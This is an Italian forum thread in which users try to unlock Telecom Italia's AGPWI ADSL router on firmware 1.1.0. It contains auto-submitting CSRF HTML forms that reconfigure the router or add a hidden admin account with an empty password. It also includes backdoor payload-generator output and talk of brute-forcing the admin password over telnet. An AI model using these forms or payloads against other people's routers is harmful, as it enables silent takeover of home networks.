IlPuntoTecnico
Hardware e Software => Connessioni ADSL/VDSL/FTTC => Topic aperto da: pipes80 - 06 Marzo 2013, 01:04
-
Buonasera a tutti, sono nuovo del forum e lo trovato subito molto interessante.
Tornando al problema, vorrei chiedere come mai non riesco a sbloccare il mio adsl wi-fi n agpwi 1.1.0, o almeno non credo di averlo fatto perchè in questa guida: http://www.informaticanapoli.it/modifica-modem-adsl2-agpwi/ sembra che la schermata di config. modem cambi, tornando quella pirelli e non telecom.
Io ho seguito la guida bene ma il blocco rimane, unica cosa che ho notato è che la telegestione è attiva, mentre prima dei tentativi non lo era
-
Ciao pipes80,
nella versione 1.1.0 hanno cambiato la password per entrare nell'interfaccia Pirelli (che adesso si chiama ADB Broadband perché è stata venduta)
Se hai fatto tutto bene dovresti riuscire a vedere la pagina di autenticazione: http://192.168.1.1/admin.html ma le credenziali admin riattizzati non funzioneranno.
Purtroppo la pass corretta non è stata ancora scoperta...
Per poter accedere all'interfaccia ADB devi scaricarti una versione precedente, ti consiglio la ver. 1.1.0_013 da qui https://repository.ilpuntotecnico.com/files/jackthevendicator/official/agpwi/
e caricarcelo usando il metodo del "ponticello" (quindi devi aprire il router) e poi ripetere tutta la procedura di sblocco...
Se invece vuoi cambiare firmware ce ne sono vari, qui ci sono spiegati i vari difetti di ognuno: https://www.ilpuntotecnico.com/forum/index.php/topic,14416.msg189111.html#msg189111
ce ne sarebbe anche un altro, che io giudico il migliore, ma bisogna fare delle saldature, e non so se sei capace
ci sarebbe anche una procedura per evitare di saldare i pin per la porta seriale, ma la stiamo ancora perfezionando...
cmq se ti interessa il link alla discussione è questo: https://www.ilpuntotecnico.com/forum/index.php/topic,14370.0.html
Se fai una ricerca nel forum (con chiave AGPWI) nella sezione Hacking ci sono vari thread che spiegano le varie procedure per mettere ogni firmware
-
Anch'io ho lo stesso problema, segnalato in un altro topic (sono nuovo e probabilmente ho sbagliato).Sto rassegnandomi a usare il ponticello e a scaricare AGPWI_1.1.0.013.
Domanda: come si tratta il file con estensione .sig (su un modem + vecchio) il fw aveva estensione img?
Curiosità. Le versioni ...013 e ...022 son più vecchie della 1.1.0?
Grazie e saluti a tutti.
-
Ciao Miguel89, sei stato molto esauriente nella tua risposta, solo che volevo evitare di aprire il modem perchè ha il sigillo di garanzia e l'ho appena preso.
Magari se riesco ad aprirlo senza che mi salti il sigillo di garanzia proverò a sbloccarlo con i ponticelli
-
a Pipes80
Tu sai sono i file *.sig scaricati dal sito e che servono per sostituire il fw?.
Grazie
-
si sono i firmware da sostituire, solo che devi aprire il modem e ponticellarlo, e successivamente flashare il nuovo fw...il problema è che devi togliere il sigillo di garanzia, almeno che non lo togli con il phone e successivamente lo reincolli, altrimenti ti si rovina ed addio garanzia
-
Curiosità. Le versioni ...013 e ...022 son più vecchie della 1.1.0?
Grazie e saluti a tutti.
Sì sono più vecchie, ma dalla versione _022, se non sbaglio, hanno cambiato la password, quindi anche se riuscite a sbloccare la pagina di accesso col metodo del payload non riuscirete ad accedere all'interfaccia ADB
P.S. se non ricordo male se inserite delle credenziali sbagliate nella pagina http://192.168.1.1/admin.html vi rimanda alla pagina di accesso Telecom...
Nelle versioni precedenti (tipo la 1.0.3 e la 1.0.4rx, ma credo anche le altre) anche se inserisci username e pass corrette la prima volta ti rimanda lo stesso sull'interfaccia Telecom, quindi bisogna provare almeno 2 volte!!
-
Aspetto fino a fine mese, nella speranza che venga trovata una soluzione meno invasiva.
Penso ci stiano lavorando anche su questo sito "http://disse.cting.org/tags/sblocco/". Dategli un occhiata
Appena ho novità mi faccio risentire e spero che facciate altrettanto.
Grazie ancora per le informazioni.
-
Ciao, eccomi quà.
Mi è venuta un'idea: quì c'è una pagina che dimostra la CSRF reconfiguration vulnerability: http://disse.cting.org/codes/alice.html
Io non posso provare se anche la versione 1.1.0 del firmware è vulnerabile perchè ho cambiato l'ip del router, potrei resettarlo per fare tornare l'ip normale, ma se poi non riesco a risbloccarlo non lo posso più configurare come è ora...
Tu riesci a provare se è vulnerabile? Su quella pagina per vedere se è vulnerabile ti fà cambiare il seriale.
Poi se funziona nella stessa pagina si può abilitare anche il menù avanzato.
A questo punto se si riesce a sbloccare non dovrebbe essere un problema neanche cambiare la password di admin, quì è spiegato come sfruttare la vulnerabilità: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability-details/#CSRF
-
Ho già provato. Non hanno ancora aggiornato il sw di sbocco e ho segnalato loro che non funziona con la AGPWI_1.1.0.
Attenzione al sito perchè vedo la luce hd che lampeggia molto (è solo un sospetto, ma penso da quello che ho letto, riescono a fare tutto con i pc anche da remoto).
A presto.
-
Non conoscevo quel sito e nemmeno quella vulnerabilità, anche se zibri ne aveva accennato l'esistenza ma non ne aveva pubblicato i dettagli e nemmeno un programma per poterla sfruttare.
Poi ho visto il codice sorgente di quella pagina e non mi sembra ci siano cose strane, quindi dovrebbe essere sicura.
Ritornando a noi, bisognerebbe provare se funziona il test (quello che sostituisce il seriale con la scritta "ROUTER VULNERABILE") sulla versione 1.1.0 dopo essersi loggati all'interfaccia Telecom (http://192.168.1.1 (http://192.168.1.1))
Se non funziona significa che hanno cambiato l'active_page.
Se invece funziona, bisogna abilitare il menu avanzato (dall'apposito bottone in quella pagina) e inserire un altro utente dato che non conosciamo la pass di admin
Si potrebbe fare con una pagina html fatta in questo modo, ma non posso provarlo perché ho un firmware diverso
<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9114">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(stack_set
(0
(path(admin/user))
(index(-1))
(set
(-1
(username(pippo))
(password())
(full_name(Amministratore))
(email())
(permissions
(mgt(1))
(fs(1))
(clients(1))
(lan_acc(1))
(wan_acc(0))
)
(notify_level
(0(15))
(1(15))
)
)
)
)
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>
A questo punto si dovrebbe poter accedere all'interfaccia ADB con l'utente pippo e la password vuota
Se qualcuno vuole provare faccia sapere i risultati...
P.S. Non mi assumo nessuna responsabilità per eventuali danni! Cmq se qualcosa va storto di solito basta premere il tasto reset per un po' di secondi e si ricarica la configurazione di default
-
Missà che non funziona...
Ho provato lo sblocco e non si sblocca, mi rimanda alla pagina: Genera file per configurazione PC
Per lo sblocco con questo metodo quel sito fà così:
<FORM action="http://192.168.1.1/admin.cgi" method="post">
<INPUT type=HIDDEN name="active_page" value="9130">
<INPUT type=HIDDEN name="page_title" value="Alice - Info">
<INPUT type=HIDDEN name="mimic_button_field" value="submit_button_avanti: avanti..">
<INPUT type=HIDDEN name="button_value" value="attiva">
<INPUT type=HIDDEN name="strip_page_top" value="0">
<INPUT type=HIDDEN name="stack_set" value="(set\
(0\
(path(wbm/admin_on))\
(set(admin_on(1)))\
)\
)
">
</FORM>
<SCRIPT>
window.onload = function(){ document.forms[0].submit(); }
</SCRIPT>
p.s. ovviamente io che ho l'ip del router diverso l'ho cambiato nella prima linea.
-
Allora significa che avranno cambiato l'active_page, che nel AGPWI 1.0.3 era 9194 (come si legge nel file .js sempre sul quel sito)... bisognerebbe controllare qual è la pagina che la ver. 1.1.0 dell'interfaccia telecom usa per modificare le entry del port forwarding e se è ancora soggetta ad attacchi CSRF
-
Scusate l'incopetenza, ma non è possibile scaricare il fw 1.1.0., trovare (tramite con sw) le differenze con l'ultima versione sboccabile e lavorare sulla parte fw differente? (si può con un debugger?)
Altra domanda a Voi espertissimi: il fw alternativo tipo Robotics è aggiornabile dal web, oppure bisogna rinstallare una versione aggiornata col ponticello?
Grazie ancora
-
La versione criptata della nuova pass, se non sbaglio, fulmine500 l'aveva già recuperata, ma mi pare che hanno cambiato anche il modo in cui viene cifrata...
Per l'altra domanda non esiste nessun firmware alternativo US Robotics per questo router!!!
-
Ancora una volta mi sono espresso male. Il router trattasi di ALICE GATE PLUS 2 WI-FI sboccato con ponticello econ fw
Name: U.S. Robotics Wireless MAXg ADSL Gateway
Version: 3.04L.01.-100727_2130 (martedì 27 luglio 2010 21:30:00)
e Vi chiedevo se erano possibili aggiornamenti. Grazie.
-
Non ho un Alice Gate Plus 2 Wi-Fi (AGA), cmq credo sia aggiornabile da interfaccia web...
L'ultima versione è questa http://beghiero.myftp.org/firmware/roleo/pirelli_alice_gate_2_plus_wifi(AGA)/fw/USRAGW2-PLUS_fs_kernel_3.04L.01.-110222_2100.zip
Comunque siamo OT, se hai altri dubbi relativi a questo router chiedi nel thread dedicato https://www.ilpuntotecnico.com/forum/index.php/topic,4091.0.html
-
Nella versione 1.1.0 l'active_page della pagina Port Mapping è 9109, però anche mandando a quella pagina l'attacco csrf non funziona.
Dici che potrebbe bastare trovare l'active_page giusta?
Però mi è venuto in mente che avevo letto un messaggio, non mi ricordo di chi, che diceva che con l'ultima versione non funzionavano più i link con la password e quindi bisognava metterla a mano ogni volta, questo mi fà pensare che non si possano più passare le opzioni nell'url... quindi la vulnerabilità csrf non ci sarebbe più...
-
Se vuoi controllare come passa i valori l'interfaccia Telecom basta che ti scarichi un'estensione per Firefox, "Firebug" e la abiliti per il sito del router, poi provi a impostare qualche regola nel port mapping, o in qualche altra pagina che passa più valori e poi val nel pannello "Net" e analizzi la richiesta POST che è stata inviata
-
Firebug ottimo; devo imparare a usare tutte le sue possibilità.
Con l'indirizzo http://192.168.1.1/admin.cgi?active_page=9xxx apro le singole pagine dalla 9066 fino alla 9166. e vedo il codice HTLM della pagina stessa.
Se la pagina non esiste mi rimanda automaticamente alla pagina di default all'indirizzo http://192.168.1.1/index.htlm o http://alicegate.homenet.telecomitalia.it/index.html.
Non riesco a trovare nel codice la parte dove probabilmente esegue il test, nella speranza di capire quali sono tutte le pagine che si possano aprire e di vedere se ci sono anche le pagine nel menù segreto esteso.
Spero che queste informazioni ti possano essere utili.
-
Le pagine del menu esteso non sono accessibili fin quando non si abilita l'interfaccia admin nella configurazione del router.
Per vedere qual è la pagina soggetta al CSRF, e se ancora lo è, devi creare un delle regole nel port mapping nell'interfaccia Telecom e poi vedere con Firebug nel pannello "Net" il messaggio post che viene inviato...
Cosa contiene??? e a che pagina viene inviato???
Qui ci sono i dettagli di come era fatto il messaggio nelle versioni precedenti: http://disse.cting.org/2012/09/02/alice-gate-agpf-csrf-reconf-vulnerability-details/
-
Non è più vulnerabile, o meglio, non allo stesso identico attacco.
I parametri sono cambiati, adesso stack_set è diventato content e (path(qualcosa/qualcosa)) (path(INT))
-
quindi sapendo che valore mettere in path(INT) si potrebbe riuscire?
-
quindi sapendo che valore mettere in path(INT) si potrebbe riuscire?
forse
-
ok, sai se qualcuno ci è già riuscito?
-
ok, sai se qualcuno ci è già riuscito?
no, non so nulla, in realtà ho questo router da 1 giorno, sto cominciando adesso a documentarmi
-
Ad un'analisi più approfondita direi che il buco è stato chiuso, non credo sia più possibile utilizzare questo metodo.
-
Ad un'analisi più approfondita direi che il buco è stato chiuso, non credo sia più possibile utilizzare questo metodo.
Quindi non ci sono altri metodi per sbloccarlo senza aprirlo e caricare un nuovo firmware?
almeno, io nel forum non ne ho trovati...
-
Ad un'analisi più approfondita direi che il buco è stato chiuso, non credo sia più possibile utilizzare questo metodo.
Quindi non ci sono altri metodi per sbloccarlo senza aprirlo e caricare un nuovo firmware?
almeno, io nel forum non ne ho trovati...
Buone notizie, sono appena riuscito a calcolare il payload corretto ;D
Lo segnalo a chi gestisce il generatore automatico.
Per chi sa compilarsi il generatore di payload, il salt è:
RIMOSSO SU RICHIESTA DELL'ADMIN
C'è un'altra barriera, admin e password del telnet sono cambiati
-
Se posso chiedere, come hai fatto?
Ho provato a comiplare ma non si sblocca, probabilmente ho sbagliato qualcosa...
Puoi vedere se con questo mac da lo stesso risultato?
$ ./payload 1a:2b:3c:4d:5e:6f
Alice BackDoor hash creator by saxdax & drPepperOne
modified by legolas558 - v0.1
Payload is:
d976705586c7f9c9
-
Se posso chiedere, come hai fatto?
Ho provato a comiplare ma non si sblocca, probabilmente ho sbagliato qualcosa...
Puoi vedere se con questo mac da lo stesso risultato?
$ ./payload 1a:2b:3c:4d:5e:6f
Alice BackDoor hash creator by saxdax & drPepperOne
modified by legolas558 - v0.1
Payload is:
d976705586c7f9c9
No, quello corretto è \x88\x5d\x37\xc7\x1c\xc3\xb3\x96
-
Confermo risultato di cor3; compilato con il salt di cor3 e il il tuo mac dà la stessa pl. \x88\x5d\x37\xc7\x1c\xc3\xb3\x96.
Proverò lo sbocco con colasoft.
-
Confermo risultato di cor3; compilato con il salt di cor3 e il il tuo mac dà la stessa pl. \x88\x5d\x37\xc7\x1c\xc3\xb3\x96.
Proverò lo sbocco con colasoft.
Il punto però è che è tutto inutile finché non si trova la nuova pass di admin
-
Scusa, per oggi non posso fare niente. Curiosità: lo slocco lo verifichi con ping o con telnet?
Non riesco ad immaginare come hai trovato il salt. Bravissimo.
-
Scusa, per oggi non posso fare niente. Curiosità: lo slocco lo verifichi con ping o con telnet?
Non riesco ad immaginare come hai trovato il salt. Bravissimo.
Con telnet
-
Non so se può servire a trovare la pw (admin va bene? oppure è da scoprire anche questa parola?).
Questa è la pagina di accesso al router sboccato.
<!--- Page(9127)=[Autenticazione Modem] ---><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><link rel="StyleSheet" type="text/css" href="images/tabelle.css"><script language="javascript" type="text/javascript" src="images/script.js"></script><TITLE>Modem Telecom Wi-Fi - Autenticazione Modem</TITLE></HEAD><BODY onload='javascript: loaded();'><SCRIPT language="Javascript"><!--
top.document.title = document.title;
// -->
</SCRIPT><DIV style="position:absolute; left:30px; top:5px; width:670px; height:690px; z-index:1; overflow: auto; "><FORM name="form_contents" method=POST action="admin.cgi" enctype="application/x-www-form-urlencoded" onSubmit="if (window.is_submit && is_submit==1) return false; is_submit=1; return true; "><INPUT type=HIDDEN name="active_page" value="9127"><INPUT type=HIDDEN name="page_title" value="Autenticazione Modem"><INPUT type=HIDDEN name="usr_param" value="842986873"><INPUT type=HIDDEN name="mimic_button_field" value=""><INPUT type=HIDDEN name="button_value" value="alice_info2"><INPUT type=HIDDEN name="strip_page_top" value="0"><SCRIPT language="Javascript"><!--
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.
* Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
/*
* Configurable variables. You may need to tweak these to be compatible with
* the server-side, but the defaults work in most cases.
*/
var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */
var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */
var chrsz = 8; /* bits per input character. 8 - ASCII; 16 - Unicode */
/*
* These are the functions you'll usually want to call
* They take string arguments and return either hex or base-64 encoded strings
*/
function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));}
function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));}
function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); }
function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); }
function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); }
/*
* Perform a simple self-test to see if the VM is working
*/
function md5_vm_test()
{
return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";
}
/*
* Calculate the MD5 of an array of little-endian words, and a bit length
*/
function core_md5(x, len)
{
/* append padding */
x[len >> 5] |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for(var i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
c = md5_ff(c, d, a, b, x[i+10], 17, -42063);
b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
d = md5_ff(d, a, b, c, x[i+13], 12, -40341101);
c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
c = md5_gg(c, d, a, b, x[i+11], 14, 643717713);
b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
c = md5_gg(c, d, a, b, x[i+15], 14, -660478335);
b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
b = md5_hh(b, c, d, a, x[i+14], 23, -35309556);
a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
d = md5_hh(d, a, b, c, x[i+12], 11, -421815835);
c = md5_hh(c, d, a, b, x[i+15], 16, 530742520);
b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
c = md5_ii(c, d, a, b, x[i+10], 15, -1051523);
b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
d = md5_ii(d, a, b, c, x[i+15], 10, -30611744);
c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
a = safe_add(a, olda);
b = safe_add(b, oldb);
c = safe_add(c, oldc);
d = safe_add(d, oldd);
}
return Array(a, b, c, d);
}
/*
* These functions implement the four basic operations the algorithm uses.
*/
function md5_cmn(q, a, b, x, s, t)
{
return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b);
}
function md5_ff(a, b, c, d, x, s, t)
{
return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function md5_gg(a, b, c, d, x, s, t)
{
return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function md5_hh(a, b, c, d, x, s, t)
{
return md5_cmn(b ^ c ^ d, a, b, x, s, t);
}
function md5_ii(a, b, c, d, x, s, t)
{
return md5_cmn(c ^ (b | (~d)), a, b, x, s, t);
}
/*
* Calculate the HMAC-MD5, of a key and some data
*/
function core_hmac_md5(key, data)
{
var bkey = str2binl(key);
if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);
var ipad = Array(16), opad = Array(16);
for(var i = 0; i < 16; i++)
{
ipad = bkey ^ 0x36363636;
opad = bkey ^ 0x5C5C5C5C;
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128);
}
/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
* to work around bugs in some JS interpreters.
*/
function safe_add(x, y)
{
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
/*
* Bitwise rotate a 32-bit number to the left.
*/
function bit_rol(num, cnt)
{
return (num << cnt) | (num >>> (32 - cnt));
}
/*
* Convert a string to an array of little-endian words
* If chrsz is ASCII, characters >255 have their hi-byte silently ignored.
*/
function str2binl(str)
{
var bin = Array();
var mask = (1 << chrsz) - 1;
for(var i = 0; i < str.length * chrsz; i += chrsz)
bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32);
return bin;
}
/*
* Convert an array of little-endian words to a string
*/
function binl2str(bin)
{
var str = "";
var mask = (1 << chrsz) - 1;
for(var i = 0; i < bin.length * 32; i += chrsz)
str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
return str;
}
/*
* Convert an array of little-endian words to a hex string.
*/
function binl2hex(binarray)
{
var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
var str = "";
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
}
return str;
}
/*
* Convert an array of little-endian words to a base-64 string
*/
function binl2b64(binarray)
{
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var str = "";
for(var i = 0; i < binarray.length * 4; i += 3)
{
var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
| ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
for(var j = 0; j < 4; j++)
{
if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
}
}
return str;
}
function SendPassword()
{
var tmp;
document.form_contents.elements['md5_pass'].value=document.form_contents.elements['password_842986873'].value+document.form_contents.elements['auth_key'].value
tmp=hex_md5(document.form_contents.elements['md5_pass'].value);
tmp2=hex_md5(document.form_contents.elements['password_842986873'].value);
document.form_contents.elements['md5_pass'].value=tmp;
document.form_contents.elements['password_842986873'].value="";
mimic_button('submit_button_login_submit: ..', 1);
}
var is_button_in_focus=false;
var is_textarea_in_focus=false;
var is_submit=0;
var is_loaded=0;
function loaded()
{
var inp;
is_loaded=1;
inp = document.form_contents.elements['password_842986873'];
if (inp)
{
inp.focus();
}
}
function keyDown(e)
{
var button_no;
button_no=e.which;
switch (button_no)
{
case 13:
if (is_button_in_focus || is_textarea_in_focus)
return true;
javascript: SendPassword();;
return false;
case 32:
if (is_button_in_focus)
{
javascript: SendPassword();;
return false;
}
return true;
default:
return true;
}
}
document.onkeydown=keyDown;
document.captureEvents(Event.KEYDOWN);
function mimic_button(button_name,use_default_cgi)
{
if (is_submit)
return;
f=document.form_contents;
f.mimic_button_field.value = button_name;
is_submit=1;
setTimeout("is_submit=0", 6000);
if (use_default_cgi)
{
if (f.encoding)
f.encoding = "application/x-www-form-urlencoded";
else
f.enctype = "application/x-www-form-urlencoded";
f.action = "admin.cgi";
}
f.submit();
}
function set_cgi(action,encoding)
{
f=document.form_contents;
if (f.encoding)
f.encoding=encoding;
else
f.enctype=encoding;
f.action=action;
}
// -->
</SCRIPT><TABLE border=0 cellpadding=0 cellspacing=0 width="640"><TR><TD class="titolo" width="100%"> Autenticazione Modem</TD></TR><TR><TD width=
-
Grazie a voi, sono riuscito a sbloccare nuovamente il router che telecom aveva aggiornato alla versione AGPWI_1.1.0.
Fortunatamente avevo creato un altro utente super amministratore prima dell'aggiornamento, per cui riesco ad entrare senza problemi nell'area amministrativa.
Posso aiutarvi in qualche modo per trovare la password di admin?
Ovviamente andando a modificare l'utente admin, non posso leggere la vecchia password nascosta dagli asterischi perché viene sostituita con una password fasulla pari a {[(+-)]}
Ciao
-
Grazie a voi, sono riuscito a sbloccare nuovamente il router che telecom aveva aggiornato alla versione AGPWI_1.1.0.
Fortunatamente avevo creato un altro utente super amministratore prima dell'aggiornamento, per cui riesco ad entrare senza problemi nell'area amministrativa.
Posso aiutarvi in qualche modo per trovare la password di admin?
Ovviamente andando a modificare l'utente admin, non posso leggere la vecchia password nascosta dagli asterischi perché viene sostituita con una password fasulla pari a {[(+-)]}
Ciao
ti ho scritto in privato
-
A questo indirizzo: http://pajhome.org.uk/crypt/md5/contrib/OneWayEncrypt.inc
ho trovato il codice originario da cui è stato tratto il codice di accesso al router AGPWIFI_1.1.0 da me postato.
Considerando che non conosco java, qualcuno può pulire il codice che ho postato in modo che si possa provare a immettere una pw e verificare l'output criptato? (p.s. c'è anche un salt da immettere ? non lo vedo)
GRAZIE
-
A questo indirizzo: http://pajhome.org.uk/crypt/md5/contrib/OneWayEncrypt.inc
ho trovato il codice originario da cui è stato tratto il codice di accesso al router AGPWIFI_1.1.0 da me postato.
Considerando che non conosco java, qualcuno può pulire il codice che ho postato in modo che si possa provare a immettere una pw e verificare l'output criptato? (p.s. c'è anche un salt da immettere ? non lo vedo)
GRAZIE
Non coincidono perché quello è solo una parte del processo di codifica.
Il risultato viene ancora una volta codificato con un algoritmo rsa con chiave a 1024bit, molto semplicemente è IMPOSSIBILE decodificare. L'unico modo è provare ad indovinarla e verificare se le password criptate coincidono ma è un approccio che richiederebbe anni (o forse secoli)
Comunque forse c'è un'altra speranza, restate in attesa ;)
-
Nell'attesa chiedo se è possibile, almeno eliminare la telegestione (file kry decriptato o altra via), considerando che telnet chiede login e pw ancora non disponibili e quindi non ho accesso alla gestione totale del router e al file discus
Almeno così posso usare il router senza incorrere in aggiornamenti che obbligherebbero a rifare tutto dall'inizio.
A presto.
-
niente di nuovo?
-
Purtroppo anch'io sono in attesa e non so come aiutare.
-
Mi è venuta un'idea pazza...che probabilmente è una str***ta ma potrebbe essere una via percorribile...
Se le password del file .conf sono cifrate tutte con lo stesso algoritmo, anche quella della WPA, si potrebbe mettere come password cifrata della WPA quella dell'utente admin e andarla a leggere in chiaro nell'interfaccia Telecom
Se fulmine o qualcun altro che ha l'accesso al menu avanzato (perché si era creato un altro utente) può fare un po' di prove si potrebbe tentare questa strada...
-
Non credo che funzioni, se la password è cifrata in md5 non è reversibile
-
Sono cocciuto. So che per decifrare la pw, come hanno già scritto possono volerci anni, ma sono curioso e vorrei togiermi alcune curiosià sul funzionamento dell'algoritmo di cifratura, che, come si legge nei post precedenti è composto da più parti (cor3)
Qualcuno gentilmente pùò farmi avere il codice "pulito" e completo, tale per cui ho come input la pw probabile e ottengo la pw cifrata. Una delle mie curiosità, ad esempio, la lunghezza della pw cifrata dipende dalla lunghezza di quella in ingresso, oppure dai caratteri che compongono la pw in ingresso? L'algoritmo funziona solo con pw ingresso o va a scomodare qualche altra cosa dipendente dallo specifico router (WPA)?
Grazie a tutti.
-
Ci fai poco anche col codice (che comunque da solo non funziona ma serve il certificato che c'è nel fw), per avere un idea di cosa c'è dietro ti lascio qualche link:
http://it.wikipedia.org/wiki/Hash
http://it.wikipedia.org/wiki/MD5
+
http://it.wikipedia.org/wiki/Crittografia_asimmetrica
http://it.wikipedia.org/wiki/RSA
In pratica ci puoi passare la vita ma la chiave non la trovi, da parte mia qualche tantativo l'ho fatto ma questa volta avranno scelto una password + lunga e complessa di admin (e tutte quelle da 1 a 7 caratteri)
-
In pratica ci puoi passare la vita ma la chiave non la trovi, da parte mia qualche tantativo l'ho fatto ma questa volta avranno scelto una password + lunga e complessa di admin (e tutte quelle da 1 a 7 caratteri)
Hai fatto un attacco a forza bruta su tutte le password da 1 a 7 caratteri alfanumerici?
ogni carattere era case sensitive?? c'erano i "caratteri speciali"?? che tool hai usato?? hydra su telnet??
Comunque riportato la questione nel thread generale per l'AGPWI nella sezione Hacking:
https://www.ilpuntotecnico.com/forum/index.php/topic,12025.615.html